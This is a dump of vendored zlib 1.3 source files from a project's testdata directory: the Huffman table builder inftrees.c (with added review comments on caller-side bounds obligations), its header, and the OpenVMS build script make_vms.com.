    unsigned ncode;             /* number of code length code lengths */
    unsigned nlen;              /* number of length code lengths */
    unsigned ndist;             /* number of distance code lengths */
    unsigned have;              /* number of code lengths in lens[] */
    code FAR *next;             /* next available space in codes[] */
    unsigned short lens[320];   /* temporary storage for code lengths */
        /* review note: inflate() writes lens[] at indices below
           nlen + ndist, and rejects nlen > 286 or ndist > 30 unless built
           with PKZIP_BUG_WORKAROUND */
    unsigned short work[288];   /* work area for code table building */
    code codes[ENOUGH];         /* space for code tables */
    int sane;                   /* if false, allow invalid distance too far */
        /* review note: inflateUndermine() can clear sane only in builds
           defining INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR */
    int back;                   /* bits back of last unprocessed length/lit */
    unsigned was;               /* initial length of match */
};

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inftrees.c
================================================
/* inftrees.c -- generate Huffman trees for efficient decoding
 * Copyright (C) 1995-2023 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

#include "zutil.h"
#include "inftrees.h"

#define MAXBITS 15      /* longest code length handled; sizes count[] and
                           offs[] in inflate_table() */

const char inflate_copyright[] =
   " inflate 1.3 Copyright 1995-2023 Mark Adler ";
/*
  If you use the zlib library in a product, an acknowledgment is welcome
  in the documentation of your product. If for some reason you cannot
  include such an acknowledgment, I would appreciate that you keep this
  copyright string in the executable of your product.
 */

/*
   Build a set of tables to decode the provided canonical Huffman code.
   The code lengths are lens[0..codes-1]. The result starts at *table,
   whose indices are 0..2^bits-1. work is a writable array of at least
   lens shorts, which is used as a work area. type is the type of code
   to be generated, CODES, LENS, or DISTS.
On return, zero is success, -1 is an invalid code, and +1 means that ENOUGH
   isn't enough. table on return points to the next available entry's address.
   bits is the requested root table index bits, and on return it is the actual
   root table index bits. It will differ if the request is greater than the
   longest code or if it is less than the shortest code.

   The signature carries no capacity for work[] or for the space behind *table,
   and the values in lens[] are not range-checked in the body, so all three are
   the caller's responsibility. The only size guard in this routine is the
   comparison of used against ENOUGH_LENS / ENOUGH_DISTS for the LENS and DISTS
   types.
 */
int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens,
                                unsigned codes, code FAR * FAR *table,
                                unsigned FAR *bits, unsigned short FAR *work) {
    unsigned len;               /* a code's length in bits */
    unsigned sym;               /* index of code symbols */
    unsigned min, max;          /* minimum and maximum code lengths */
    unsigned root;              /* number of index bits for root table */
    unsigned curr;              /* number of index bits for current table */
    unsigned drop;              /* code bits to drop for sub-table */
    int left;                   /* number of prefix codes available */
    unsigned used;              /* code entries in table used */
    unsigned huff;              /* Huffman code */
    unsigned incr;              /* for incrementing code, index */
    unsigned fill;              /* index for replicating entries */
    unsigned low;               /* low bits for current root entry */
    unsigned mask;              /* mask for low root bits */
    code here;                  /* table entry for duplication */
    code FAR *next;             /* next available space in table */
    const unsigned short FAR *base;     /* base value table to use */
    const unsigned short FAR *extra;    /* extra bits table to use */
    unsigned match;             /* use base and extra for symbol >= match */
    unsigned short count[MAXBITS+1];    /* number of codes of each length */
    unsigned short offs[MAXBITS+1];     /* offsets in table for each length */
    static const unsigned short lbase[31] = { /* Length codes 257..285 base */
        3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31,
        35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258, 0, 0};
    static const unsigned short lext[31] = { /* Length codes 257..285 extra */
        16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 18, 18, 18, 18,
        19, 19, 19, 19, 20, 20, 20, 20, 21, 21, 21, 21, 16, 198, 203};
    static const unsigned short dbase[32] = { /* Distance codes 0..29 base */
        1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193,
        257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145,
        8193, 12289, 16385, 24577, 0, 0};
    static const unsigned short dext[32] = { /* Distance codes 0..29 extra */
        16, 16, 16, 16, 17, 17, 18, 18, 19, 19, 20, 20, 21, 21, 22, 22,
        23, 23, 24, 24, 25, 25, 26, 26, 27, 27,
        28, 28, 29, 29, 64, 64};

    /*
       Process a set of code lengths to create a canonical Huffman code. The
       code lengths are lens[0..codes-1]. Each length corresponds to the
       symbols 0..codes-1. The Huffman code is generated by first sorting the
       symbols by length from short to long, and retaining the symbol order
       for codes with equal lengths. Then the code starts with all zero bits
       for the first code of the shortest length, and the codes are integer
       increments for the same length, and zeros are appended as the length
       increases. For the deflate format, these bits are stored backwards
       from their more natural integer increment ordering, and so when the
       decoding tables are built in the large loop below, the integer codes
       are incremented backwards.

       This routine assumes, but does not check, that all of the entries in
       lens[] are in the range 0..MAXBITS. The caller must assure this.
       1..MAXBITS is interpreted as that code length. zero means that that
       symbol does not occur in this code.

       The codes are sorted by computing a count of codes for each length,
       creating from that a table of starting indices for each length in the
       sorted table, and then entering the symbols in order in the sorted
       table. The sorted table is work[], with that space being provided by
       the caller.

       The length counts are used for other purposes as well, i.e. finding
       the minimum and maximum length codes, determining if there are any
       codes at all, checking for a valid set of lengths, and looking ahead
       at length counts to determine sub-table sizes when building the
       decoding tables.
     */

    /* accumulate lengths for codes (assumes lens[] all in 0..MAXBITS) */
    for (len = 0; len <= MAXBITS; len++)
        count[len] = 0;
    /* lens[sym] is used directly as the index into count[], which has
       MAXBITS+1 entries; a length above MAXBITS would index outside the
       array, which is why the range of lens[] is a caller obligation */
    for (sym = 0; sym < codes; sym++)
        count[lens[sym]]++;

    /* bound code lengths, force root to be within code lengths */
    root = *bits;
    for (max = MAXBITS; max >= 1; max--)
        if (count[max] != 0) break;
    if (root > max) root = max;
    if (max == 0) {                     /* no symbols to code at all */
        here.op = (unsigned char)64;    /* invalid code marker */
        here.bits = (unsigned char)1;
        here.val = (unsigned short)0;
        *(*table)++ = here;             /* make a table to force an error */
        *(*table)++ = here;
        *bits = 1;
        return 0;     /* no symbols, but wait for decoding to report error */
    }
    for (min = 1; min < max; min++)
        if (count[min] != 0) break;
    if (root < min) root = min;

    /* check for an over-subscribed or incomplete set of lengths */
    /* both -1 returns below happen before anything is stored in work[] or
       through *table, so a rejected length set leaves those untouched */
    left = 1;
    for (len = 1; len <= MAXBITS; len++) {
        left <<= 1;
        left -= count[len];
        if (left < 0) return -1;        /* over-subscribed */
    }
    if (left > 0 && (type == CODES || max != 1))
        return -1;                      /* incomplete set */

    /* generate offsets into symbol table for each length for sorting */
    offs[1] = 0;
    for (len = 1; len < MAXBITS; len++)
        offs[len + 1] = offs[len] + count[len];

    /* sort symbols by length, by symbol order within each length */
    /* one short is written to work[] for every symbol with a nonzero length;
       work[] has no size parameter, so its capacity is a caller obligation */
    for (sym = 0; sym < codes; sym++)
        if (lens[sym] != 0) work[offs[lens[sym]]++] = (unsigned short)sym;

    /*
       Create and fill in decoding tables. In this loop, the table being
       filled is at next and has curr index bits. The code being used is huff
       with length len. That code is converted to an index by dropping drop
       bits off of the bottom. For codes where len is less than drop + curr,
       those top drop + curr - len bits are incremented through all values to
       fill the table with replicated entries.

       root is the number of index bits for the root table. When len exceeds
       root, sub-tables are created pointed to by the root entry with an index
       of the low root bits of huff. This is saved in low to check for when a
       new sub-table should be started. drop is zero when the root table is
       being filled, and drop is root when sub-tables are being filled.

       When a new sub-table is needed, it is necessary to look ahead in the
       code lengths to determine what size sub-table is needed. The length
       counts are used for this, and so count[] is decremented as codes are
       entered in the tables.

       used keeps track of how many table entries have been allocated from the
       provided *table space. It is checked for LENS and DIST tables against
       the constants ENOUGH_LENS and ENOUGH_DISTS to guard against changes in
       the initial root table size constants. See the comments in inftrees.h
       for more information.

       sym increments through all symbols, and the loop terminates when
       all codes of length max, i.e. all codes, have been processed. This
       routine permits incomplete codes, so another loop after this one fills
       in the rest of the decoding tables with invalid code markers.
     */

    /* set up for code type */
    switch (type) {
    case CODES:
        base = extra = work;    /* dummy value--not used */
        match = 20;
        break;
    case LENS:
        base = lbase;
        extra = lext;
        match = 257;
        break;
    default:    /* DISTS */
        base = dbase;
        extra = dext;
        match = 0;
    }

    /* initialize state for loop */
    huff = 0;                   /* starting code */
    sym = 0;                    /* starting code symbol */
    len = min;                  /* starting code length */
    next = *table;              /* current table to fill in */
    curr = root;                /* current table index bits */
    drop = 0;                   /* current bits to drop from code for index */
    low = (unsigned)(-1);       /* trigger new sub-table when len > root */
    used = 1U << root;          /* use root table entries */
    mask = used - 1;            /* mask for comparing low */

    /* check available table space */
    /* only LENS and DISTS are bounded here; no limit is applied to CODES in
       this function -- NOTE(review): presumably the root size and table the
       caller passes keep that case in range; confirm at the call sites */
    if ((type == LENS && used > ENOUGH_LENS) ||
        (type == DISTS && used > ENOUGH_DISTS))
        return 1;

    /* process all codes and make table entries */
    for (;;) {
        /* create table entry */
        here.bits = (unsigned char)(len - drop);
        if (work[sym] + 1U < match) {
            here.op = (unsigned char)0;
            here.val = work[sym];
        }
        else if (work[sym] >= match) {
            /* base[] and extra[] are indexed by symbol minus match; lbase and
               lext hold 31 entries, dbase and dext 32 -- NOTE(review): staying
               inside them depends on the codes count the caller passes */
            here.op = (unsigned char)(extra[work[sym] - match]);
            here.val = base[work[sym] - match];
        }
        else {
            here.op = (unsigned char)(32 + 64);         /* end of block */
            here.val = 0;
        }

        /* replicate for those indices with low len bits equal to huff */
        incr = 1U << (len - drop);
        fill = 1U << curr;
        min = fill;                 /* save offset to next table */
        do {
            fill -= incr;
            next[(huff >> drop) + fill] = here;
        } while (fill != 0);

        /* backwards increment the len-bit code huff */
        incr = 1U << (len - 1);
        while (huff & incr)
            incr >>= 1;
        if (incr != 0) {
            huff &= incr - 1;
            huff += incr;
        }
        else
            huff = 0;

        /* go to next symbol, update count, len */
        sym++;
        if (--(count[len]) == 0) {
            if (len == max) break;
            len = lens[work[sym]];
        }

        /* create new sub-table if needed */
        if (len > root && (huff & mask) != low) {
            /* if first time, transition to sub-tables */
            if (drop == 0)
                drop = root;

            /* increment past last table */
            next += min;            /* here min is 1 << curr */

            /* determine length of next table */
            curr = len - drop;
            left = (int)(1 << curr);
            while (curr + drop < max) {
                left -= count[curr + drop];
                if (left <= 0) break;
                curr++;
                left <<= 1;
            }

            /* check for enough space */
            /* the running total is tested before the new sub-table is linked
               into the root table or filled on a later iteration */
            used += 1U << curr;
            if ((type == LENS && used > ENOUGH_LENS) ||
                (type == DISTS && used > ENOUGH_DISTS))
                return 1;

            /* point entry in root table to sub-table */
            low = huff & mask;
            (*table)[low].op = (unsigned char)curr;
            (*table)[low].bits = (unsigned char)root;
            (*table)[low].val = (unsigned short)(next - *table);
        }
    }

    /* fill in remaining table entry if code is incomplete (guaranteed to have
       at most one remaining entry, since if the code is incomplete, the
       maximum code length that was allowed to get this far is one bit) */
    if (huff != 0) {
        here.op = (unsigned char)64;            /* invalid code marker */
        here.bits = (unsigned char)(len - drop);
        here.val = (unsigned short)0;
        next[huff] = here;
    }

    /* set return parameters */
    *table += used;
    *bits = root;
    return 0;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inftrees.h
================================================ /* inftrees.h -- header to use inftrees.c * Copyright (C) 1995-2005, 2010 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of the compression library and is subject to change. Applications should only use zlib.h. */ /* Structure for decoding tables. Each entry provides either the information needed to do the operation requested by the code that indexed that table entry, or it provides a pointer to another table that indexes more bits of the code. op indicates whether the entry is a pointer to another table, a literal, a length or distance, an end-of-block, or an invalid code. For a table pointer, the low four bits of op is the number of index bits of that table. For a length or distance, the low four bits of op is the number of extra bits to get after the code. bits is the number of bits in this code or part of the code to drop off of the bit buffer. val is the actual byte to output in the case of a literal, the base length or distance, or the offset from the current table to the next table. Each entry is four bytes. */ typedef struct { unsigned char op; /* operation, extra bits, table bits */ unsigned char bits; /* bits in this part of the code */ unsigned short val; /* offset in table or code value */ } code; /* op values as set by inflate_table(): 00000000 - literal 0000tttt - table link, tttt != 0 is the number of table index bits 0001eeee - length or distance, eeee is the number of extra bits 01100000 - end of block 01000000 - invalid code */ /* Maximum size of the dynamic table. The maximum number of code structures is 1444, which is the sum of 852 for literal/length codes and 592 for distance codes. These values were found by exhaustive searches using the program examples/enough.c found in the zlib distribution. 
The arguments to that program are the number of symbols, the initial root table size, and the maximum bit length of a code. "enough 286 9 15" for literal/length codes returns 852, and "enough 30 6 15" for distance codes returns 592. The initial root table size (9 or 6) is found in the fifth argument of the inflate_table() calls in inflate.c and infback.c. If the root table size is changed, then these maximum sizes would need to be recalculated and updated. */ #define ENOUGH_LENS 852 #define ENOUGH_DISTS 592 #define ENOUGH (ENOUGH_LENS+ENOUGH_DISTS) /* Type of code to build for inflate_table() */ typedef enum { CODES, LENS, DISTS } codetype; int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens, unsigned codes, code FAR * FAR *table, unsigned FAR *bits, unsigned short FAR *work); ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/make_vms.com ================================================ $! make libz under VMS written by $! Martin P.J. Zinser $! $! In case of problems with the install you might contact me at $! zinser@zinser.no-ip.info(preferred) or $! martin.zinser@eurexchange.com (work) $! $! Make procedure history for Zlib $! $!------------------------------------------------------------------------------ $! Version history $! 0.01 20060120 First version to receive a number $! 0.02 20061008 Adapt to new Makefile.in $! 0.03 20091224 Add support for large file check $! 0.04 20100110 Add new gzclose, gzlib, gzread, gzwrite $! 0.05 20100221 Exchange zlibdefs.h by zconf.h.in $! 0.06 20120111 Fix missing amiss_err, update zconf_h.in, fix new examples $! subdir path, update module search in makefile.in $! 0.07 20120115 Triggered by work done by Alexey Chupahin completely redesigned $! shared image creation $! 0.08 20120219 Make it work on VAX again, pre-load missing symbols to shared $! image $! 0.09 20120305 SMS. P1 sets builder ("MMK", "MMS", " " (built-in)). $! 
"" -> automatic, preference: MMK, MMS, built-in. $! $ on error then goto err_exit $! $ true = 1 $ false = 0 $ tmpnam = "temp_" + f$getjpi("","pid") $ tt = tmpnam + ".txt" $ tc = tmpnam + ".c" $ th = tmpnam + ".h" $ define/nolog tconfig 'th' $ its_decc = false $ its_vaxc = false $ its_gnuc = false $ s_case = False $! $! Setup variables holding "config" information $! $ Make = "''p1'" $ name = "Zlib" $ version = "?.?.?" $ v_string = "ZLIB_VERSION" $ v_file = "zlib.h" $ ccopt = "/include = []" $ lopts = "" $ dnsrl = "" $ aconf_in_file = "zconf.h.in#zconf.h_in#zconf_h.in" $ conf_check_string = "" $ linkonly = false $ optfile = name + ".opt" $ mapfile = name + ".map" $ libdefs = "" $ vax = f$getsyi("HW_MODEL").lt.1024 $ axp = f$getsyi("HW_MODEL").ge.1024 .and. f$getsyi("HW_MODEL").lt.4096 $ ia64 = f$getsyi("HW_MODEL").ge.4096 $! $! 2012-03-05 SMS. $! Why is this needed? And if it is needed, why not simply ".not. vax"? $! $!!! if axp .or. ia64 then set proc/parse=extended $! $ whoami = f$parse(f$environment("Procedure"),,,,"NO_CONCEAL") $ mydef = F$parse(whoami,,,"DEVICE") $ mydir = f$parse(whoami,,,"DIRECTORY") - "][" $ myproc = f$parse(whoami,,,"Name") + f$parse(whoami,,,"type") $! $! Check for MMK/MMS $! $ if (Make .eqs. "") $ then $ If F$Search ("Sys$System:MMS.EXE") .nes. "" Then Make = "MMS" $ If F$Type (MMK) .eqs. "STRING" Then Make = "MMK" $ else $ Make = f$edit( Make, "trim") $ endif $! $ gosub find_version $! $ open/write topt tmp.opt $ open/write optf 'optfile' $! $ gosub check_opts $! $! Look for the compiler used $! $ gosub check_compiler $ close topt $ close optf $! $ if its_decc $ then $ ccopt = "/prefix=all" + ccopt $ if f$trnlnm("SYS") .eqs. "" $ then $ if axp $ then $ define sys sys$library: $ else $ ccopt = "/decc" + ccopt $ define sys decc$library_include: $ endif $ endif $! $! 2012-03-05 SMS. $! Why /NAMES = AS_IS? Why not simply ".not. vax"? And why not on VAX? $! $ if axp .or. 
ia64 $ then $ ccopt = ccopt + "/name=as_is/opt=(inline=speed)" $ s_case = true $ endif $ endif $ if its_vaxc .or. its_gnuc $ then $ if f$trnlnm("SYS").eqs."" then define sys sys$library: $ endif $! $! Build a fake configure input header $! $ open/write conf_hin config.hin $ write conf_hin "#undef _LARGEFILE64_SOURCE" $ close conf_hin $! $! $ i = 0 $FIND_ACONF: $ fname = f$element(i,"#",aconf_in_file) $ if fname .eqs. "#" then goto AMISS_ERR $ if f$search(fname) .eqs. "" $ then $ i = i + 1 $ goto find_aconf $ endif $ open/read/err=aconf_err aconf_in 'fname' $ open/write aconf zconf.h $ACONF_LOOP: $ read/end_of_file=aconf_exit aconf_in line $ work = f$edit(line, "compress,trim") $ if f$extract(0,6,work) .nes. "#undef" $ then $ if f$extract(0,12,work) .nes. "#cmakedefine" $ then $ write aconf line $ endif $ else $ cdef = f$element(1," ",work) $ gosub check_config $ endif $ goto aconf_loop $ACONF_EXIT: $ write aconf "" $ write aconf "/* VMS specifics added by make_vms.com: */" $ write aconf "#define VMS 1" $ write aconf "#include " $ write aconf "#include " $ write aconf "#ifdef _LARGEFILE" $ write aconf "# define off64_t __off64_t" $ write aconf "# define fopen64 fopen" $ write aconf "# define fseeko64 fseeko" $ write aconf "# define lseek64 lseek" $ write aconf "# define ftello64 ftell" $ write aconf "#endif" $ write aconf "#if !defined( __VAX) && (__CRTL_VER >= 70312000)" $ write aconf "# define HAVE_VSNPRINTF" $ write aconf "#endif" $ close aconf_in $ close aconf $ if f$search("''th'") .nes. "" then delete 'th';* $! Build the thing plain or with mms $! $ write sys$output "Compiling Zlib sources ..." $ if make.eqs."" $ then $ if (f$search( "example.obj;*") .nes. "") then delete example.obj;* $ if (f$search( "minigzip.obj;*") .nes. 
"") then delete minigzip.obj;* $ CALL MAKE adler32.OBJ "CC ''CCOPT' adler32" - adler32.c zlib.h zconf.h $ CALL MAKE compress.OBJ "CC ''CCOPT' compress" - compress.c zlib.h zconf.h $ CALL MAKE crc32.OBJ "CC ''CCOPT' crc32" - crc32.c zlib.h zconf.h $ CALL MAKE deflate.OBJ "CC ''CCOPT' deflate" - deflate.c deflate.h zutil.h zlib.h zconf.h $ CALL MAKE gzclose.OBJ "CC ''CCOPT' gzclose" - gzclose.c zutil.h zlib.h zconf.h $ CALL MAKE gzlib.OBJ "CC ''CCOPT' gzlib" - gzlib.c zutil.h zlib.h zconf.h $ CALL MAKE gzread.OBJ "CC ''CCOPT' gzread" - gzread.c zutil.h zlib.h zconf.h $ CALL MAKE gzwrite.OBJ "CC ''CCOPT' gzwrite" - gzwrite.c zutil.h zlib.h zconf.h $ CALL MAKE infback.OBJ "CC ''CCOPT' infback" - infback.c zutil.h inftrees.h inflate.h inffast.h inffixed.h $ CALL MAKE inffast.OBJ "CC ''CCOPT' inffast" - inffast.c zutil.h zlib.h zconf.h inffast.h $ CALL MAKE inflate.OBJ "CC ''CCOPT' inflate" - inflate.c zutil.h zlib.h zconf.h infblock.h $ CALL MAKE inftrees.OBJ "CC ''CCOPT' inftrees" - inftrees.c zutil.h zlib.h zconf.h inftrees.h $ CALL MAKE trees.OBJ "CC ''CCOPT' trees" - trees.c deflate.h zutil.h zlib.h zconf.h $ CALL MAKE uncompr.OBJ "CC ''CCOPT' uncompr" - uncompr.c zlib.h zconf.h $ CALL MAKE zutil.OBJ "CC ''CCOPT' zutil" - zutil.c zutil.h zlib.h zconf.h $ write sys$output "Building Zlib ..." $ CALL MAKE libz.OLB "lib/crea libz.olb *.obj" *.OBJ $ write sys$output "Building example..." $ CALL MAKE example.OBJ "CC ''CCOPT' [.test]example" - [.test]example.c zlib.h zconf.h $ call make example.exe "LINK example,libz.olb/lib" example.obj libz.olb $ write sys$output "Building minigzip..." $ CALL MAKE minigzip.OBJ "CC ''CCOPT' [.test]minigzip" - [.test]minigzip.c zlib.h zconf.h $ call make minigzip.exe - "LINK minigzip,libz.olb/lib" - minigzip.obj libz.olb $ else $ gosub crea_mms $ write sys$output "Make ''name' ''version' with ''Make' " $ 'make' $ endif $! $! Create shareable image $! 
$ gosub crea_olist $ write sys$output "Creating libzshr.exe" $ call map_2_shopt 'mapfile' 'optfile' $ LINK_'lopts'/SHARE=libzshr.exe modules.opt/opt,'optfile'/opt $ write sys$output "Zlib build completed" $ delete/nolog tmp.opt;* $ exit $AMISS_ERR: $ write sys$output "No source for config.hin found." $ write sys$output "Tried any of ''aconf_in_file'" $ goto err_exit $CC_ERR: $ write sys$output "C compiler required to build ''name'" $ goto err_exit $ERR_EXIT: $ set message/facil/ident/sever/text $ close/nolog optf $ close/nolog topt $ close/nolog aconf_in $ close/nolog aconf $ close/nolog out $ close/nolog min $ close/nolog mod $ close/nolog h_in $ write sys$output "Exiting..." $ exit 2 $! $! $MAKE: SUBROUTINE !SUBROUTINE TO CHECK DEPENDENCIES $ V = 'F$Verify(0) $! P1 = What we are trying to make $! P2 = Command to make it $! P3 - P8 What it depends on $ $ If F$Search(P1) .Eqs. "" Then Goto Makeit $ Time = F$CvTime(F$File(P1,"RDT")) $arg=3 $Loop: $ Argument = P'arg $ If Argument .Eqs. "" Then Goto Exit $ El=0 $Loop2: $ File = F$Element(El," ",Argument) $ If File .Eqs. " " Then Goto Endl $ AFile = "" $Loop3: $ OFile = AFile $ AFile = F$Search(File) $ If AFile .Eqs. "" .Or. AFile .Eqs. OFile Then Goto NextEl $ If F$CvTime(F$File(AFile,"RDT")) .Ges. Time Then Goto Makeit $ Goto Loop3 $NextEL: $ El = El + 1 $ Goto Loop2 $EndL: $ arg=arg+1 $ If arg .Le. 8 Then Goto Loop $ Goto Exit $ $Makeit: $ VV=F$VERIFY(0) $ write sys$output P2 $ 'P2 $ VV='F$Verify(VV) $Exit: $ If V Then Set Verify $ENDSUBROUTINE $!------------------------------------------------------------------------------ $! $! Check command line options and set symbols accordingly $! $!------------------------------------------------------------------------------ $! Version history $! 0.01 20041206 First version to receive a number $! 0.02 20060126 Add new "HELP" target $ CHECK_OPTS: $ i = 1 $ OPT_LOOP: $ if i .lt. 9 $ then $ cparm = f$edit(p'i',"upcase") $! $! Check if parameter actually contains something $! 
$ if f$edit(cparm,"trim") .nes. "" $ then $ if cparm .eqs. "DEBUG" $ then $ ccopt = ccopt + "/noopt/deb" $ lopts = lopts + "/deb" $ endif $ if f$locate("CCOPT=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ ccopt = ccopt + f$extract(start,len,cparm) $ if f$locate("AS_IS",f$edit(ccopt,"UPCASE")) .lt. f$length(ccopt) - then s_case = true $ endif $ if cparm .eqs. "LINK" then linkonly = true $ if f$locate("LOPTS=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ lopts = lopts + f$extract(start,len,cparm) $ endif $ if f$locate("CC=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ cc_com = f$extract(start,len,cparm) if (cc_com .nes. "DECC") .and. - (cc_com .nes. "VAXC") .and. - (cc_com .nes. "GNUC") $ then $ write sys$output "Unsupported compiler choice ''cc_com' ignored" $ write sys$output "Use DECC, VAXC, or GNUC instead" $ else $ if cc_com .eqs. "DECC" then its_decc = true $ if cc_com .eqs. "VAXC" then its_vaxc = true $ if cc_com .eqs. "GNUC" then its_gnuc = true $ endif $ endif $ if f$locate("MAKE=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ mmks = f$extract(start,len,cparm) $ if (mmks .eqs. "MMK") .or. (mmks .eqs. "MMS") $ then $ make = mmks $ else $ write sys$output "Unsupported make choice ''mmks' ignored" $ write sys$output "Use MMK or MMS instead" $ endif $ endif $ if cparm .eqs. "HELP" then gosub bhelp $ endif $ i = i + 1 $ goto opt_loop $ endif $ return $!------------------------------------------------------------------------------ $! $! Look for the compiler used $! $! Version history $! 0.01 20040223 First version to receive a number $! 0.02 20040229 Save/set value of decc$no_rooted_search_lists $! 0.03 20060202 Extend handling of GNU C $! 0.04 20090402 Compaq -> hp $CHECK_COMPILER: $ if (.not. (its_decc .or. its_vaxc .or. 
its_gnuc)) $ then $ its_decc = (f$search("SYS$SYSTEM:DECC$COMPILER.EXE") .nes. "") $ its_vaxc = .not. its_decc .and. (F$Search("SYS$System:VAXC.Exe") .nes. "") $ its_gnuc = .not. (its_decc .or. its_vaxc) .and. (f$trnlnm("gnu_cc") .nes. "") $ endif $! $! Exit if no compiler available $! $ if (.not. (its_decc .or. its_vaxc .or. its_gnuc)) $ then goto CC_ERR $ else $ if its_decc $ then $ write sys$output "CC compiler check ... hp C" $ if f$trnlnm("decc$no_rooted_search_lists") .nes. "" $ then $ dnrsl = f$trnlnm("decc$no_rooted_search_lists") $ endif $ define/nolog decc$no_rooted_search_lists 1 $ else $ if its_vaxc then write sys$output "CC compiler check ... VAX C" $ if its_gnuc $ then $ write sys$output "CC compiler check ... GNU C" $ if f$trnlnm(topt) then write topt "gnu_cc:[000000]gcclib.olb/lib" $ if f$trnlnm(optf) then write optf "gnu_cc:[000000]gcclib.olb/lib" $ cc = "gcc" $ endif $ if f$trnlnm(topt) then write topt "sys$share:vaxcrtl.exe/share" $ if f$trnlnm(optf) then write optf "sys$share:vaxcrtl.exe/share" $ endif $ endif $ return $!------------------------------------------------------------------------------ $! $! If MMS/MMK are available dump out the descrip.mms if required $! $CREA_MMS: $ write sys$output "Creating descrip.mms..." $ create descrip.mms $ open/append out descrip.mms $ copy sys$input: out $ deck # descrip.mms: MMS description file for building zlib on VMS # written by Martin P.J. 
Zinser # OBJS = adler32.obj, compress.obj, crc32.obj, gzclose.obj, gzlib.obj\ gzread.obj, gzwrite.obj, uncompr.obj, infback.obj\ deflate.obj, trees.obj, zutil.obj, inflate.obj, \ inftrees.obj, inffast.obj $ eod $ write out "CFLAGS=", ccopt $ write out "LOPTS=", lopts $ write out "all : example.exe minigzip.exe libz.olb" $ copy sys$input: out $ deck @ write sys$output " Example applications available" libz.olb : libz.olb($(OBJS)) @ write sys$output " libz available" example.exe : example.obj libz.olb link $(LOPTS) example,libz.olb/lib minigzip.exe : minigzip.obj libz.olb link $(LOPTS) minigzip,libz.olb/lib clean : delete *.obj;*,libz.olb;*,*.opt;*,*.exe;* # Other dependencies. adler32.obj : adler32.c zutil.h zlib.h zconf.h compress.obj : compress.c zlib.h zconf.h crc32.obj : crc32.c zutil.h zlib.h zconf.h deflate.obj : deflate.c deflate.h zutil.h zlib.h zconf.h example.obj : [.test]example.c zlib.h zconf.h gzclose.obj : gzclose.c zutil.h zlib.h zconf.h gzlib.obj : gzlib.c zutil.h zlib.h zconf.h gzread.obj : gzread.c zutil.h zlib.h zconf.h gzwrite.obj : gzwrite.c zutil.h zlib.h zconf.h inffast.obj : inffast.c zutil.h zlib.h zconf.h inftrees.h inffast.h inflate.obj : inflate.c zutil.h zlib.h zconf.h inftrees.obj : inftrees.c zutil.h zlib.h zconf.h inftrees.h minigzip.obj : [.test]minigzip.c zlib.h zconf.h trees.obj : trees.c deflate.h zutil.h zlib.h zconf.h uncompr.obj : uncompr.c zlib.h zconf.h zutil.obj : zutil.c zutil.h zlib.h zconf.h infback.obj : infback.c zutil.h inftrees.h inflate.h inffast.h inffixed.h $ eod $ close out $ return $!------------------------------------------------------------------------------ $! $! Read list of core library sources from makefile.in and create options $! needed to build shareable image $! $CREA_OLIST: $ open/read min makefile.in $ open/write mod modules.opt $ src_check_list = "OBJZ =#OBJG =" $MRLOOP: $ read/end=mrdone min rec $ i = 0 $SRC_CHECK_LOOP: $ src_check = f$element(i, "#", src_check_list) $ i = i+1 $ if src_check .eqs. 
"#" then goto mrloop $ if (f$extract(0,6,rec) .nes. src_check) then goto src_check_loop $ rec = rec - src_check $ gosub extra_filnam $ if (f$element(1,"\",rec) .eqs. "\") then goto mrloop $MRSLOOP: $ read/end=mrdone min rec $ gosub extra_filnam $ if (f$element(1,"\",rec) .nes. "\") then goto mrsloop $MRDONE: $ close min $ close mod $ return $!------------------------------------------------------------------------------ $! $! Take record extracted in crea_olist and split it into single filenames $! $EXTRA_FILNAM: $ myrec = f$edit(rec - "\", "trim,compress") $ i = 0 $FELOOP: $ srcfil = f$element(i," ", myrec) $ if (srcfil .nes. " ") $ then $ write mod f$parse(srcfil,,,"NAME"), ".obj" $ i = i + 1 $ goto feloop $ endif $ return $!------------------------------------------------------------------------------ $! $! Find current Zlib version number $! $FIND_VERSION: $ open/read h_in 'v_file' $hloop: $ read/end=hdone h_in rec $ rec = f$edit(rec,"TRIM") $ if (f$extract(0,1,rec) .nes. "#") then goto hloop $ rec = f$edit(rec - "#", "TRIM") $ if f$element(0," ",rec) .nes. "define" then goto hloop $ if f$element(1," ",rec) .eqs. v_string $ then $ version = 'f$element(2," ",rec)' $ goto hdone $ endif $ goto hloop $hdone: $ close h_in $ return $!------------------------------------------------------------------------------ $! $CHECK_CONFIG: $! $ in_ldef = f$locate(cdef,libdefs) $ if (in_ldef .lt. f$length(libdefs)) $ then $ write aconf "#define ''cdef' 1" $ libdefs = f$extract(0,in_ldef,libdefs) + - f$extract(in_ldef + f$length(cdef) + 1, - f$length(libdefs) - in_ldef - f$length(cdef) - 1, - libdefs) $ else $ if (f$type('cdef') .eqs. "INTEGER") $ then $ write aconf "#define ''cdef' ", 'cdef' $ else $ if (f$type('cdef') .eqs. "STRING") $ then $ write aconf "#define ''cdef' ", """", '''cdef'', """" $ else $ gosub check_cc_def $ endif $ endif $ endif $ return $!------------------------------------------------------------------------------ $! $! 
